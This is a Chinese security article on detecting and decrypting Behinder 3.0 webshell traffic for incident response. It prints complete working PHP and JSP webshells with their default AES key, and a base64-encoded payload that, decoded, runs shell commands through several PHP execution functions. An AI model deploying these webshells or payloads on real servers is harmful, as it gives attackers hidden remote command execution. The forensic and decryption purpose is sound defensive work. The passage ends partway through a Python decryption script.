冰蝎3.0流量分析与还原

  • A+
所属分类:安全文章

希望这篇文章可以真正帮助那些被打穿的单位识别与溯源。


phpshell

与冰蝎2.0在建立连接时随机生成AES密钥同时明文交换不同是,冰蝎3.0的AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。该方法保证了全密文传输,但是依然具有一定的特点。

特征:连接content-length =5464or 5484(占比较多)
基于AES加密和base64编码,解密时通过对shell.php内容的截获获取密钥,具体操作如下所示:

冰蝎3.0流量分析与还原

以下为冰蝎3.0webshell

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

捕获流量如下图:

冰蝎3.0流量分析与还原

冰蝎3.0流量分析与还原

开始还原流量:
这时候的应急时也要首先获取到webshell的文件,通过提取文件中的key 也就是该密钥为连接密码32位md5值的前16位 作为我们AES的解密密钥

冰蝎3.0流量分析与还原

assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsNCiAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAka2V5KTsNCiAgICAgICAgcmV0dXJuOw0KICAgICAgICANCiAgICB9DQogICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGdldFNhZmVTdHIoJGtXSlcpKTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICAkX1NFU1NJT05bJ2snXSk7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JGNtZD0ibHMiOw0KbWFpbigkY21kKTs='));

再对其中base编码的数据进行解码
内容如下:

@error_reporting(0);

function getSafeStr($str){
$s1 = iconv('utf-8','gbk//IGNORE',$str);
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
if($s0 == $str){
return $s0;
}else{
return iconv('gbk','utf-8//IGNORE',$str);
}
}
function main($cmd)
{
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);
$result = array();
$PadtJn = @ini_get('disable_functions');
if (! empty($PadtJn)) {
$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
$PadtJn = explode(',', $PadtJn);
$PadtJn = array_map('trim', $PadtJn);
} else {
$PadtJn = array();
}
$c = $cmd;
if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
$c = $c . " 2>&1n";
}
$JueQDBH = 'is_callable';
$Bvce = 'in_array';
if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
ob_start();
system($c);
$kWJW = ob_get_contents();
ob_end_clean();
} else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
$handle = proc_open($c, array(
array(
'pipe',
'r'
),
array(
'pipe',
'w'
),
array(
'pipe',
'w'
)
), $pipes);
$kWJW = NULL;
while (! feof($pipes[1])) {
$kWJW .= fread($pipes[1], 1024);
}
@proc_close($handle);
} else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
ob_start();
passthru($c);
$kWJW = ob_get_contents();
ob_end_clean();
} else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
$kWJW = shell_exec($c);
} else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
$kWJW = array();
exec($c, $kWJW);
$kWJW = join(chr(10), $kWJW) . chr(10);
} else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
$fp = popen($c, 'r');
$kWJW = NULL;
if (is_resource($fp)) {
while (! feof($fp)) {
$kWJW .= fread($fp, 1024);
}
}
@pclose($fp);
} else {
$kWJW = 0;
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
$key = $_SESSION['k'];
echo encrypt(json_encode($result), $key);
return;

}
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode(getSafeStr($kWJW));
echo encrypt(json_encode($result), $_SESSION['k']);
}

function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$cmd="ls";
main($cmd);

可以看到请求的内容为执行了ls命令

响应内容解密雷同

冰蝎3.0流量分析与还原

冰蝎3.0流量分析与还原

并附上github师傅们的解密脚本 目前只支持php
https://github.com/melody27/behinder_decrypt

jspshell

jspwebshell 相对来说也不是很复杂
先po一下

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

也要首先获取到webshell的文件,通过提取文件中的key 也就是该密钥为连接密码32位md5值的前16位 作为我们AES的解密密钥

请求包解密代码:


#coding:utf-8
import base64
from Crypto.Cipher import AES
import binascii
import json #注:python3 安装 Crypto 是 pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pycryptodome<br><br>
#解密
def aes_decode(data, key):
try:
aes = AES.new(str.encode(key), AES.MODE_ECB) # 初始化加密器
decrypted_text = aes.decrypt(data) # 解密
decrypted_text = decrypted_text[:-(decrypted_text[-1])]
except Exception as e:
print(e)
return decrypted_text



if __name__ == '__main__':
key = 'e45e329feb5d925b' # 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
data="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"
data=base64.b64decode(data)

# mi = aes_encode(data,key)
